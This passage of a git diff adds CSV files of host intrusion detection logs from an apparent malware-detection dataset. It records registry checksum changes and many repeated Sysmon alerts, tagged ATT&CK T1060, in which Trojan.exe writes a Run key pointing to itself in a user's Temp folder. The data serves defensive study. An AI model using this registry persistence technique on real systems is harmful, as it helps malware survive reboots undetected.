CLR Networking\Linkage' checksum changed. +Old md5sum was: 'f2496e76843d3318dccb05e89de48e65' +New md5sum is : '22eccf8057abaee681c65921ed4dfd76' +Old sha1sum was: 'd1f1c760d953bccde63b6d040be4ac1547b9f8da' +New sha1sum is : '75b9f63fb39d8326b5d1fbe4cfd4f444e3138efb' +" +"Apr 7, 2020 @ 09:24:11.299",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Data\Performance' checksum changed. +Old md5sum was: '2f43dfc7a4f84a246bcfda248e5ab44f' +New md5sum is : '603235ac17c08e2e792cc1e066accf4a' +Old sha1sum was: 'e8c0484ba1276d30bd9f673e47502e2c0eca65e1' +New sha1sum is : 'c3e400ae2d44428000be5d8ecae4de21384ad7b2' +" +"Apr 7, 2020 @ 09:24:11.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Data\Linkage' checksum changed. +Old md5sum was: '6316cf64e18ca66898bade4b8efd333c' +New md5sum is : 'd946ca647fd33e7e2dfb13b31d3aa068' +Old sha1sum was: 'd97a575a82ce1f2cbd79316da61e2b230f81a402' +New sha1sum is : '223e6c8e127a0c2814fb50f5f7020810dab8f9b9' +" +"Apr 7, 2020 @ 09:23:55.016",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:23:48.606",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:23:07.453",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-msdownload' was added. +" +"Apr 7, 2020 @ 09:23:07.422",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-complus' was added. +" +"Apr 7, 2020 @ 09:23:07.406",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/octet-stream' was added. +" +"Apr 7, 2020 @ 09:23:06.405",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-msdownload' was added. +" +"Apr 7, 2020 @ 09:23:06.390",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/x-complus' was added. +" +"Apr 7, 2020 @ 09:23:06.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Classes\Protocols\Filter\application/octet-stream' was added. +" +"Apr 7, 2020 @ 09:22:54.671",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:22:48.890",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:22:48.843",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:21:30.997",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'e61d4dd51aecfa812eb5dd09547bb3fa' +New md5sum is : '02583aa1ae32b1990176644dc3952c81' +Old sha1sum was: 'dbf704cda5f548a498bb22a7c8acb6fc63869305' +New sha1sum is : '0ba688310b1196088281fa0da17b1e9c2f96ea7e' +" +"Apr 7, 2020 @ 09:21:30.919",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'd3c3db84b379850af744b570210159ac' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '61986d785485024b932a0f9116e6a930eddd2d4b' +" +"Apr 7, 2020 @ 09:21:23.825",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +" +"Apr 7, 2020 @ 09:21:20.262",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:21:12.715",3,"Windows Logon Success", diff --git a/data/MW_9_HIDS_3.csv b/data/MW_9_HIDS_3.csv new file mode 100644 index 0000000..6a82114 --- /dev/null +++ b/data/MW_9_HIDS_3.csv @@ -0,0 +1,4442 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 24, 2020 @ 16:28:21.069",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:17.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:17.430124200Z"",""eventRecordID"":""2055"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:17.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:17.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:19.753",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:16.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:16.393106800Z"",""eventRecordID"":""2054"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:16.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:16.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:18.754",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:15.372 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:15.377777100Z"",""eventRecordID"":""2053"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:15.372\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:15.372"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:17.723",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:14.355 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:14.370952600Z"",""eventRecordID"":""2052"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:14.355\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:14.355"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:16.771",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:13.326 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:13.333494600Z"",""eventRecordID"":""2051"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:13.326\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:13.326"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:15.726",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:12.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:12.305943800Z"",""eventRecordID"":""2050"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:12.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:12.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:14.676",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:11.277 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:11.292349100Z"",""eventRecordID"":""2049"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:11.277\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:11.277"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:13.704",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:10.261 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:10.277974500Z"",""eventRecordID"":""2048"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:10.261\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:10.261"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:11.622",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:09.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:09.230706600Z"",""eventRecordID"":""2047"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:09.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:09.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:11.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:08.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 